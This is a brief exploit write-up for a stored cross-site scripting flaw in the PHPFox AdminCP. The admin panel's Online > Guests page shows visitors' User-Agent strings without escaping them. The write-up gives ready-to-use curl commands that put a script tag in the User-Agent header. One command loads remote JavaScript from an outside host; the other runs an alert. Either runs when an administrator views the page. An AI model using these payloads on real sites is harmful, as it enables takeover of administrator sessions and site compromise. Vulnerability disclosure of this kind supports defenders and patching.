PHPFox XSS ADMINCP
[+] Links
[+] CVE’s
[+] Description
The system stores all urls accessed in a database table, below information in the same ‘phpfox_log_session’
[phpfox]
> desc phpfox_log_session;

the column that can be manipulated is:
-> user_agent (100)
all acess store in the system, such as bots and users wandering around the web site, can be seen in:
AdminCP
TOOLS > Online > Guests/Boots
Output
| IP ADDRESS | User-Agent | …
knowing this, the following code was created to inject a script into the AdminCP with User-Agent.
$ curl -A "< script src='http://www.example.com/script.js'>< / script >" \ http://www.meusite.com.br/
OR
$ curl -A "< script>alert(1); < / script >" \ http://www.meusite.com.br/
when any user with administrative access in.
‘AdminCP’
TOOLS > Online > Guests/Boots
we have the script running in the administrative area.